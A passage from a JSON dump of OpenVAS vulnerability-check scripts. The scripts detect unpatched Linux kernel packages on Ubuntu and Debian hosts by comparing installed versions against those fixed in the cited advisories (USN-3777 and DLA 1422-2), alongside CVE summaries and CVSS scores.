value:\"AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3777-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Jann Horn discovered that the vmacache subsystem did not properly handle\nsequence number overflows, leading to a use-after-free vulnerability. A\nlocal attacker could use this to cause a denial of service (system crash)\nor execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the Linux\nkernel did not properly handle some indirect calls, reducing the\neffectiveness of Spectre v2 mitigations for paravirtual guests. A local\nattacker could use this to expose sensitive information. (CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution and\nprediction of return addresses via Return Stack Buffer (RSB) may allow\nunauthorized memory reads via sidechannel attacks. An attacker could use\nthis to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttil discovered that the KVM implementation\nin the Linux kernel did not properly check privilege levels when emulating\nsome instructions. An unprivileged attacker in a guest VM could use this to\nescalate privileges within the guest. (CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the iSCSI\ntarget implementation of the Linux kernel. A remote attacker could use this\nto cause a denial of service (system crash). (CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of the\nLinux kernel. A local attacker could use this to cause a denial of service\n(kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the IRDA\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-6555)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 18.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3777-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3777-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU18\\.04 LTS\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1021-gcp\", ver:\"4.15.0-1021.22\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1021-oem\", ver:\"4.15.0-1021.24\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1023-aws\", ver:\"4.15.0-1023.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1023-kvm\", ver:\"4.15.0-1023.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1024-raspi2\", ver:\"4.15.0-1024.26\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-generic\", ver:\"4.15.0-36.39\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-generic-lpae\", ver:\"4.15.0-36.39\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-lowlatency\", ver:\"4.15.0-36.39\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-snapdragon\", ver:\"4.15.0-36.39\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.15.0.1023.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.15.0.1021.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.15.0.36.38\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.15.0.36.38\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.15.0.1021.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.15.0.1023.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.15.0.36.38\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-oem\", ver:\"4.15.0.1021.23\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.15.0.1024.22\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.15.0.36.38\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-05-29T18:33:23", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-02T00:00:00", "id": "OPENVAS:1361412562310843644", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843644", "title": "Ubuntu Update for linux-gcp USN-3777-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3777_2.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for linux-gcp USN-3777-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843644\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-02 08:07:24 +0200 (Tue, 02 Oct 2018)\");\n script_cve_id(\"CVE-2018-17182\", \"CVE-2018-15594\", \"CVE-2018-15572\", \"CVE-2018-10853\",\n \"CVE-2018-14633\", \"CVE-2018-6554\", \"CVE-2018-6555\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-gcp USN-3777-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-gcp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3777-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu\n16.04 LTS.\n\nJann Horn discovered that the vmacache subsystem did not properly handle\nsequence number overflows, leading to a use-after-free vulnerability. A\nlocal attacker could use this to cause a denial of service (system crash)\nor execute arbitrary code. (CVE-2018-17182)\n\nIt was discovered that the paravirtualization implementation in the Linux\nkernel did not properly handle some indirect calls, reducing the\neffectiveness of Spectre v2 mitigations for paravirtual guests. A local\nattacker could use this to expose sensitive information. (CVE-2018-15594)\n\nIt was discovered that microprocessors utilizing speculative execution and\nprediction of return addresses via Return Stack Buffer (RSB) may allow\nunauthorized memory reads via sidechannel attacks. An attacker could use\nthis to expose sensitive information. (CVE-2018-15572)\n\nAndy Lutomirski and Mika Penttil discovered that the KVM implementation\nin the Linux kernel did not properly check privilege levels when emulating\nsome instructions. An unprivileged attacker in a guest VM could use this to\nescalate privileges within the guest. (CVE-2018-10853)\n\nIt was discovered that a stack-based buffer overflow existed in the iSCSI\ntarget implementation of the Linux kernel. A remote attacker could use this\nto cause a denial of service (system crash). (CVE-2018-14633)\n\nIt was discovered that a memory leak existed in the IRDA subsystem of the\nLinux kernel. A local attacker could use this to cause a denial of service\n(kernel memory exhaustion). (CVE-2018-6554)\n\nIt was discovered that a use-after-free vulnerability existed in the IRDA\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2018-6555)\");\n script_tag(name:\"affected\", value:\"linux-gcp on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3777-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3777-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-1021-gcp\", ver:\"4.15.0-1021.22~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-generic\", ver:\"4.15.0-36.39~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-generic-lpae\", ver:\"4.15.0-36.39~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.15.0-36-lowlatency\", ver:\"4.15.0-36.39~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.15.0.1021.35\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.15.0.36.59\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.15.0.36.59\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.15.0.1021.35\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.15.0.36.59\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-oem\", ver:\"4.15.0.36.59\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-05-29T18:33:30", "bulletinFamily": "scanner", "description": "The previous update to linux failed to build for the armhf (ARM EABI\nhard-float) architecture. This update corrects that. For all other\narchitectures, there is no need to upgrade or reboot again. For\nreference, the relevant part of the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-5715\n\nMultiple researchers have discovered a vulnerability in various\nprocessors supporting speculative execution, enabling an attacker\ncontrolling an unprivileged process to read memory from arbitrary\naddresses, including from the kernel and all other processes\nrunning on the system.\n\nThis specific attack has been named Spectre variant 2 (branch\ntarget injection) and is mitigated for the x86 architecture (amd64\nand i386) by using new microcoded features.\n\nThis mitigation requires an update to the processor", "modified": "2019-03-18T00:00:00", "published": "2018-07-16T00:00:00", "id": "OPENVAS:1361412562310891422", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891422", "title": "Debian LTS Advisory ([SECURITY] [DLA 1422-2] linux security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1422.nasl 14281 2019-03-18 14:53:48Z cfischer $\n#\n# Auto-generated from advisory DLA 1422-2 using nvtgen 1.0\n# Script version: 2.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891422\");\n script_version(\"$Revision: 14281 $\");\n script_cve_id(\"CVE-2017-5715\", \"CVE-2017-5753\", \"CVE-2018-1000204\", \"CVE-2018-1066\", \"CVE-2018-10853\",\n \"CVE-2018-1093\", \"CVE-2018-10940\", \"CVE-2018-1130\", \"CVE-2018-11506\", \"CVE-2018-12233\",\n \"CVE-2018-3665\", \"CVE-2018-5814\", \"CVE-2018-9422\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1422-2] linux security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:53:48 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-16 00:00:00 +0200 (Mon, 16 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n3.16.57-1. This update additionally fixes Debian bug #898165, and\nincludes many more bug fixes from stable update 3.16.57.\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name:\"summary\", value:\"The previous update to linux failed to build for the armhf (ARM EABI\nhard-float) architecture. This update corrects that. For all other\narchitectures, there is no need to upgrade or reboot again. For\nreference, the relevant part of the original advisory text follows.\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-5715\n\nMultiple researchers have discovered a vulnerability in various\nprocessors supporting speculative execution, enabling an attacker\ncontrolling an unprivileged process to read memory from arbitrary\naddresses, including from the kernel and all other processes\nrunning on the system.\n\nThis specific attack has been named Spectre variant 2 (branch\ntarget injection) and is mitigated for the x86 architecture (amd64\nand i386) by using new microcoded features.\n\nThis mitigation requires an update to the processor's microcode,\nwhich is non-free. For recent Intel processors, this is included\nin the intel-microcode package from version 3.20180425.1~deb8u1.\nFor other processors, it may be included in an update to the\nsystem BIOS or UEFI firmware, or in a later update to the\namd64-microcode package.\n\nThis vulnerability was already mitigated for the x86 architecture\nby the 'retpoline' feature.\n\nDescription truncated. Please see the references for more information.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-arm\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.8-x86\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.9-x86\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-doc-3.16\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-586\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-686-pae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armel\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-armhf\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-i386\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp-lpae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-common\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-ixp4xx\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-kirkwood\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-orion5x\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-versatile\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-586\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-686-pae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-all\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-all-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-all-armel\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-all-armhf\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-all-i386\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-armmp\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-armmp-lpae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-common\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-ixp4xx\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-kirkwood\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-orion5x\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-5-versatile\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-586\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-686-pae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-all\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-all-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-all-armel\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-all-armhf\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-all-i386\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-armmp\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-armmp-lpae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-common\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-ixp4xx\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-kirkwood\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-orion5x\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-6-versatile\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-586\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae-dbg\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64-dbg\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp-lpae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-ixp4xx\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-kirkwood\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-orion5x\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-versatile\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-586\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-686-pae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-686-pae-dbg\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-amd64\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-amd64-dbg\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-armmp\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.16.0-5-armmp-lpae\", ver:\"3.16.57-1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 